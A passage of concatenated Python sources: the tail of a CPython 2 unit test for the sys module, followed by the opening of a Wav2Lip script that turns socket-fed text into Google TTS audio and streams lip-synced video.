self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.test_support.reap_threads
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, basestring)
self.assertIsInstance(sys.exec_prefix, basestring)
self.assertIsInstance(sys.executable, basestring)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.long_info), 2)
self.assertTrue(sys.long_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.long_info.sizeof_digit >= 1)
self.assertEqual(type(sys.long_info.bits_per_digit), int)
self.assertEqual(type(sys.long_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertIsInstance(sys.maxint, int)
if test.test_support.have_unicode:
self.assertIsInstance(sys.maxunicode, int)
self.assertIsInstance(sys.platform, basestring)
self.assertIsInstance(sys.prefix, basestring)
self.assertIsInstance(sys.version, basestring)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
if not (os.environ.get('PYTHONIOENCODING') or
(sys.__stdout__.isatty() and sys.__stderr__.isatty())):
self.skipTest('stdout/stderr encoding is not set')
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning", "hash_randomization")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
@test.test_support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, '?')
def test_call_tracing(self):
self.assertEqual(sys.call_tracing(str, (2,)), "2")
self.assertRaises(TypeError, sys.call_tracing, str, 2)
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
import subprocess
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c", 'import sys; print repr(sys.executable)'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
executable = p.communicate()[0].strip()
p.wait()
self.assertIn(executable, ["''", repr(sys.executable)])
@test.test_support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.long_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.test_support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
size = test.test_support.calcobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size('l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size('P PP') + gc_header_size)
def test_errors(self):
class BadSizeof(object):
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof(object):
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class OverflowSizeof(long):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.test_support.calcobjsize
self.assertEqual(sys.getsizeof(True, -1), size('l'))
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.test_support.calcobjsize
vsize = test.test_support.calcvobjsize
check = self.check_sizeof
# bool
check(True, size('l'))
# buffer
with test.test_support.check_py3k_warnings():
check(buffer(''), size('2P2Pil'))
# builtin_function_or_method
check(len, size('3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('iPP') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size('P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size('7P'))
# instance (old-style class)
check(class_oldstyle(), size('3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size('4P'))
# complex
check(complex(0,1), size('2d'))
# code
check(get_cell().func_code, size('4i8Pi3P'))
# BaseException
check(BaseException(), size('3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size('5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size('5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size('5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size('2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size('2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('3P2P') + 8*calcsize('P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size('3P2P') + 8*calcsize('P2P') + 16*calcsize('P2P'))
# dictionary-keyview
check({}.viewkeys(), size('P'))
# dictionary-valueview
check({}.viewvalues(), size('P'))
# dictionary-itemview
check({}.viewitems(), size('P'))
# dictionary iterator
check(iter({}), size('P2PPP'))
# dictionary-keyiterator
check({}.iterkeys(), size('P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size('P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size('P2PPP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('l3P'))
# file
f = file(test.test_support.TESTFN, 'wb')
try:
check(f, size('4P2i4P3i3P3i'))
finally:
f.close()
test.test_support.unlink(test.test_support.TESTFN)
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('P'))
# classmethod
check(bar, size('P'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pi2P'))
# integer
check(1, size('l'))
check(100, size('l'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('lP'))
# long
check(0L, vsize(''))
check(1L, vsize('') + self.longdigit)
check(-1L, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.long_info.bits_per_digit
check(long(PyLong_BASE), vsize('') + 2*self.longdigit)
check(long(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(long(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('P'))
# None
check(None, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCObject
# PyCapsule
# XXX
# rangeiterator
check(iter(xrange(1)), size('4l'))
# reverse
check(reversed(''), size('PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('lP'))
check(frozenset(sample), s + newsize*calcsize('lP'))
# setiterator
check(iter(set()), size('P3P'))
# slice
check(slice(1), size('3P'))
# str
vh = test.test_support._vheader
check('', calcsize(vh + 'lic'))
check('abc', calcsize(vh + 'lic') + 3)
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# tupleiterator
check(iter(()), size('lP'))
# type
s = vsize('P2P15Pl4PP9PP11PI' # PyTypeObject
'39P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'6P' # PyBufferProcs
'2P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size('PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size('2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pl2P'))
# xrange
check(xrange(1), size('3l'))
check(xrange(66000), size('3l'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.test_support.calcobjsize
vsize = test.test_support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(''))
# imp.NullImporter
import imp
f = open(test.test_support.TESTFN, 'wb')
try:
check(imp.NullImporter(f.name), size(''))
finally:
f.close()
test.test_support.unlink(test.test_support.TESTFN)
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
inference_webstreaming_socket_text_googleSTT_googleTTS.py
|
# merge of inference_webstreaming_socket_audio.py, tts_socket_server.py
# run this code, then once model is loaded run the stt_stream_socket_client.py code on remote machine
# finally run the ffplay command with the appropriate port forwarding etc. to see the results
# Alternatively, at the client just run run_streaming_text.sh with the stt_stream_socket_client.py
# and the json in same directory
'''
Architecture: Thread 1 (text_input), Thread 2 (audio out), Thread 3 (video), Thread 4 (audio in).
Thread 1: receive text packets from socket connection (with paragraphs separated by \n)
send text to google TTS API and receive the audio
write audio to a queue read by thread 4
Thread 2: receive audio packet from thread 1, generate video frames and send to ffmpeg process
(using named pipe)
Thread 3: receive audio packet from thread 1 and send to ffmpeg process (using named pipe)
Thread 4: send generated audio to threads 2 & 3 using queue
keeps checking every 200ms if there is sufficient data to be played
in the input queue, if not it plays silence for the remaining time and
transfer to threads 2 & 3 (using queue)
'''
import os
os.environ["OMP_NUM_THREADS"] = "1"
import numpy as np
import scipy, cv2, os, sys, argparse, audio
import json, subprocess, random, string
from tqdm import tqdm
from glob import glob
import torch, face_detection
from models import Wav2Lip
import platform
import threading, queue
import subprocess
import zipfile
import argparse
import ffmpeg
import datetime
import time
import cv2
import wave
import logging
import librosa
import pyaudio
import socket
os.environ["GOOGLE_APPLICATION_CREDENTIALS"]="../google_stt_tts/text2vid-3d1ad0183321.json"
from google.cloud import texttospeech
sys.path.insert(1, 'util')
import ffmpeg_stream
parser = argparse.ArgumentParser(description='Inference code to lip-sync videos in the wild using Wav2Lip models')
parser.add_argument('--checkpoint_path', type=str,
help='Name of saved checkpoint to load weights from', required=True)
parser.add_argument('--face', type=str,
help='Filepath of video/image that contains faces to use', required=True)
parser.add_argument('--static', type=bool,
help='If True, then use only first video frame for inference', default=False)
parser.add_argument('--fps', type=float, help='Can be specified only if input is a static image (default: 25)',
default=25., required=False)
parser.add_argument('--pads', nargs='+', type=int, default=[0, 10, 0, 0],
help='Padding (top, bottom, left, right). Please adjust to include chin at least')
parser.add_argument('--face_det_batch_size', type=int,
help='Batch size for face detection', default=16)
parser.add_argument('--wav2lip_batch_size', type=int, help='Batch size for Wav2Lip model(s)', default=128)
parser.add_argument('--resize_factor', default=1, type=int,
help='Reduce the resolution by this factor. Sometimes, best results are obtained at 480p or 720p')
parser.add_argument('--crop', nargs='+', type=int, default=[0, -1, 0, -1],
help='Crop video to a smaller region (top, bottom, left, right). Applied after resize_factor and rotate arg. '
'Useful if multiple face present. -1 implies the value will be auto-inferred based on height, width')
parser.add_argument('--box', nargs='+', type=int, default=[-1, -1, -1, -1],
help='Specify a constant bounding box for the face. Use only as a last resort if the face is not detected.'
'Also, might work only if the face is not moving around much. Syntax: (top, bottom, left, right).')
parser.add_argument('--rotate', default=False, action='store_true',
help='Sometimes videos taken from a phone can be flipped 90deg. If true, will flip video right by 90deg.'
'Use if you get a flipped result, despite feeding a normal looking video')
parser.add_argument('--nosmooth', default=False, action='store_true',
help='Prevent smoothing face detections over a short temporal window')
# IP and Port for Video Streaming
parser.add_argument("-i", "--ip", type=str, default="0.0.0.0", #172.24.92.25
help="ip address of the device")
parser.add_argument("-o", "--port", type=int, default=8080,
help="ephemeral port number of the server (1024 to 65535)")
# Port for incoming text stream
parser.add_argument('--text_port', default=50007, type=int,
help='Port for websocket server for text input (default: 50007)') # Arbitrary non-privileged port
args = parser.parse_args()
args.img_size = 96
args.audio_sr = 16000
args.BYTE_WIDTH = 2 # related to FORMAT (bytes/audio frame)
# NUM_AUDIO_SAMPLES_PER_STEP: defines the chunks in which audio is processed.
# Should be such that number of video frames within step is an integer
# NOTE: Current system assumes 3200 (i.e., 200ms chunks)
# NOTE: Can't make this much smaller, since that reduces the mel size to so small
# that the mel_chunk produced is smaller than allowed by neural network architecture.
NUM_AUDIO_SAMPLES_PER_STEP = np.ceil(args.audio_sr*0.2).astype('int') # 200 ms for 16000 Hz
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
if os.path.isfile(args.face) and args.face.split('.')[1] in ['jpg', 'png', 'jpeg']:
args.static = True
def get_smoothened_boxes(boxes, T):
for i in range(len(boxes)):
if i + T > len(boxes):
window = boxes[len(boxes) - T:]
else:
window = boxes[i: i + T]
boxes[i] = np.mean(window, axis=0)
return boxes
def face_detect(images):
detector = face_detection.FaceAlignment(face_detection.LandmarksType._2D,
flip_input=False, device=device)
batch_size = args.face_det_batch_size
while 1:
predictions = []
try:
for i in range(0, len(images), batch_size):
predictions.extend(detector.get_detections_for_batch(np.array(images[i:i + batch_size])))
except RuntimeError:
if batch_size == 1:
raise RuntimeError(
'Image too big to run face detection on GPU. Please use the --resize_factor argument')
batch_size //= 2
print('Recovering from OOM error; New batch size: {}'.format(batch_size))
continue
break
results = []
pady1, pady2, padx1, padx2 = args.pads
for rect, image in zip(predictions, images):
if rect is None:
cv2.imwrite('temp/faulty_frame.jpg', image) # check this frame where the face was not detected.
raise ValueError('Face not detected! Ensure the video contains a face in all the frames.')
y1 = max(0, rect[1] - pady1)
y2 = min(image.shape[0], rect[3] + pady2)
x1 = max(0, rect[0] - padx1)
x2 = min(image.shape[1], rect[2] + padx2)
results.append([x1, y1, x2, y2])
boxes = np.array(results)
if not args.nosmooth: boxes = get_smoothened_boxes(boxes, T=5)
results = [[image[y1: y2, x1:x2], (y1, y2, x1, x2)] for image, (x1, y1, x2, y2) in zip(images, boxes)]
del detector
return results
def face_detect_wrapper(frames):
if args.box[0] == -1:
if not args.static:
face_det_results = face_detect(frames) # BGR2RGB for CNN face detection
else:
face_det_results = face_detect([frames[0]])
else:
print('Using the specified bounding box instead of face detection...')
y1, y2, x1, x2 = args.box
face_det_results = [[f[y1: y2, x1:x2], (y1, y2, x1, x2)] for f in frames]
return face_det_results
def datagen(frames, face_det_results, mels, start_frame_idx):
# start frame idx is the current frame idx in the output video
# we start from this point
img_batch, mel_batch, frame_batch, coords_batch = [], [], [], []
start_frame_idx = start_frame_idx%len(frames) # loop back
num_frames = len(mels)
# take frames from start_frame_idx to start_frame_idx+num_frames
# wrapping around if necessary
if not args.static:
if len(frames) == 1:
frames_current = frames
face_det_results_current = face_det_results
if start_frame_idx + num_frames > len(frames):
frames_current = frames[start_frame_idx:] + frames[:start_frame_idx + num_frames-len(frames)]
face_det_results_current = face_det_results[start_frame_idx:] + face_det_results[:start_frame_idx + num_frames-len(frames)]
else:
frames_current = frames[start_frame_idx:start_frame_idx+num_frames]
face_det_results_current = face_det_results[start_frame_idx:start_frame_idx+num_frames]
else:
frames_current = frames
face_det_results_current = face_det_results
for i, m in enumerate(mels):
idx = 0 if args.static else i % len(frames_current)
frame_to_save = frames_current[idx].copy()
face, coords = face_det_results_current[idx].copy()
face = cv2.resize(face, (args.img_size, args.img_size))
img_batch.append(face)
mel_batch.append(m)
frame_batch.append(frame_to_save)
coords_batch.append(coords)
if len(img_batch) >= args.wav2lip_batch_size:
img_batch, mel_batch = np.asarray(img_batch), np.asarray(mel_batch)
img_masked = img_batch.copy()
img_masked[:, args.img_size // 2:] = 0
img_batch = np.concatenate((img_masked, img_batch), axis=3) / 255.
mel_batch = np.reshape(mel_batch, [len(mel_batch), mel_batch.shape[1], mel_batch.shape[2], 1])
yield img_batch, mel_batch, frame_batch, coords_batch
img_batch, mel_batch, frame_batch, coords_batch = [], [], [], []
if len(img_batch) > 0:
img_batch, mel_batch = np.asarray(img_batch), np.asarray(mel_batch)
img_masked = img_batch.copy()
img_masked[:, args.img_size // 2:] = 0
img_batch = np.concatenate((img_masked, img_batch), axis=3) / 255.
mel_batch = np.reshape(mel_batch, [len(mel_batch), mel_batch.shape[1], mel_batch.shape[2], 1])
yield img_batch, mel_batch, frame_batch, coords_batch
# mel_step_size: size of each mel_chunk (except last one which can be shorter)
# can't be made very small due to neural network architecture (should be > roughly 3)
mel_step_size = 16
device = 'cuda' if torch.cuda.is_available() else 'cpu'
print('Using {} for inference.'.format(device))
def _load(checkpoint_path):
if device == 'cuda':
checkpoint = torch.load(checkpoint_path)
else:
checkpoint = torch.load(checkpoint_path,
map_location=lambda storage, loc: storage)
return checkpoint
def load_model(path):
model = Wav2Lip()
print("Load checkpoint from: {}".format(path))
checkpoint = _load(path)
s = checkpoint["state_dict"]
new_s = {}
for k, v in s.items():
new_s[k.replace('module.', '')] = v
model.load_state_dict(new_s)
model = model.to(device)
return model.eval()
def text_input_thread_handler(audio_packet_queue, start_audio_input_thread, kill_audio_input_thread):
# Instantiates a client
client = texttospeech.TextToSpeechClient()
# Build the voice request, select the language code ("en-US") and the ssml
# voice gender ("female")
voice = texttospeech.VoiceSelectionParams(
language_code='en-US',
name='en-IN-Wavenet-B',
ssml_gender=texttospeech.SsmlVoiceGender.MALE)
# Select the type of audio file you want returned
audio_config = texttospeech.AudioConfig(
audio_encoding=texttospeech.AudioEncoding.LINEAR16,
sample_rate_hertz=args.audio_sr,speaking_rate=1.0, pitch=5)
HOST = '' # Symbolic name meaning all available interfaces
# Set up websocket server and listen for connections
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, args.text_port))
print ('Listening for incoming connection on port',args.text_port)
s.listen(1)
conn, addr = s.accept()
print ('Connected by', addr)
start_audio_input_thread.set()
while True:
line = b''
conn_closed = False
while True: # recv till newline
# socket.MSG_WAITALL: this parameter ensures we wait till sufficient data received
byte = conn.recv(1,socket.MSG_WAITALL)
# reading one byte at a time: not efficient!
# http://developerweb.net/viewtopic.php?id=4006 has some suggestions
if byte == b'\n':
break
elif len(byte) == 0:
conn_closed = True
break
else:
line += byte
if conn_closed:
break
line = line.decode(encoding='UTF-8')
line = line.rstrip()
print("Input text:",line)
# Perform the text-to-speech request on the text input with the selected
# voice parameters and audio file type
# Set the text input to be synthesized
print('Synthesizing Audio')
synthesis_input = texttospeech.SynthesisInput(text=line)
response = client.synthesize_speech(
input=synthesis_input, voice=voice, audio_config=audio_config
)
audio_bytes = response.audio_content[44:] # header of length 44 at the start
print('Audio Synthesized')
audio_packet_queue.put(audio_bytes)
kill_audio_input_thread.set()
'''
function to set up input audio connection, write output to queues
'''
def audio_input_thread_handler(inqueue, outqueues, start_audio_input_thread, kill_audio_input_thread):
# we work in 200 ms chunks
time_per_write = 0.2
current_audio_packet_data = b''
desired_len = args.BYTE_WIDTH*NUM_AUDIO_SAMPLES_PER_STEP
# block till we have start_audio_input_thread event (set when connection to peer established)
while not start_audio_input_thread.is_set():
pass
while True:
start_time = time.time()
audio_bytes_to_write = b''
while not inqueue.empty():
# first check if we have new data coming in
current_audio_packet_data += inqueue.get()
if len(current_audio_packet_data) >= desired_len:
audio_bytes_to_write = current_audio_packet_data[:desired_len]
current_audio_packet_data = current_audio_packet_data[desired_len:]
else:
audio_bytes_to_write = current_audio_packet_data + bytearray(desired_len-len(current_audio_packet_data))
current_audio_packet_data = b''
for q in outqueues:
q.put(audio_bytes_to_write)
if kill_audio_input_thread.is_set() and len(current_audio_packet_data) == 0:
break
time.sleep(time_per_write-time.time()+start_time)
'''
receive audio from audio_inqueue and write to fifo_filename_audio pipe in
chunks
'''
def audio_thread_handler(fifo_filename_audio, audio_inqueue):
fifo_audio_out = open(fifo_filename_audio, "wb")
# this blocks until the read for the fifo opens so we run in separate thread
# read frame one by one, process and write to fifo pipe
while True:
in_audio_frame = audio_inqueue.get()
if len(in_audio_frame) == 0:
break
ffmpeg_stream.write_audio_frame(fifo_audio_out, in_audio_frame)
fifo_audio_out.close()
##### For streaming #####
def preprocess_video():
if not os.path.isfile(args.face):
raise ValueError('--face argument must be a valid path to video/image file')
elif args.face.split('.')[1] in ['jpg', 'png', 'jpeg']:
full_frames = [cv2.imread(args.face)]
fps = args.fps
else:
video_stream = cv2.VideoCapture(args.face)
fps = video_stream.get(cv2.CAP_PROP_FPS)
print('Reading video frames...')
full_frames = []
while 1:
still_reading, frame = video_stream.read()
if not still_reading:
video_stream.release()
break
if args.resize_factor > 1:
frame = cv2.resize(frame, (frame.shape[1] // args.resize_factor, frame.shape[0] // args.resize_factor))
if args.rotate:
frame = cv2.rotate(frame, cv2.cv2.ROTATE_90_CLOCKWISE)
y1, y2, x1, x2 = args.crop
if x2 == -1: x2 = frame.shape[1]
if y2 == -1: y2 = frame.shape[0]
frame = frame[y1:y2, x1:x2]
full_frames.append(frame)
print("Number of frames available for inference: " + str(len(full_frames)))
return full_frames
def txt2vid_inference(fifo_filename_video, audio_inqueue, width, height):
# Get frames from input video
full_frames = preprocess_video()
# run face detection (precompute)
face_det_results = face_detect_wrapper(full_frames)
# Overall process works like this:
# - split wav file into small chunks
# - Initiate output stream for writing frames to intermediate video file
# - Go through the audio chunks one by one. For each chunk:
# - compute melspectrrogram: mels
# - convert mel into overlapping chunks (#chunks = #frames correspoonding to audio chunk, e.g., for 200 ms audio and fps 25, we get 5 frames)
# - Now go through the mel_chunks and the input video frames, and run NN to compute the output frame one by one, which are written to the output stream
# - Combine the output file with video with the original audio file to get final output
# mel_idx_multiplier: this is supposed to align the audio melspec to the video fps,
# by default set to 80.0/fps. This determines the mel chunking process, defining the
# by which we move a window of size mel_step_size (16). For very short audio chunks, the
# default vale doesn't work well due to rounding effects and edge effects leading to very
# short mel vector relative to audio length. We fix this by reducing the mel_idx_multiplier
# which reduces the offsets of the consecutive mel chunks, and makes sure we get enough
# frames for each audio chunk.
# NOTE: The value has been chosen for fps=25, and NUM_AUDIO_SAMPLES_PER_STEP 3200. For other values, please recalculate
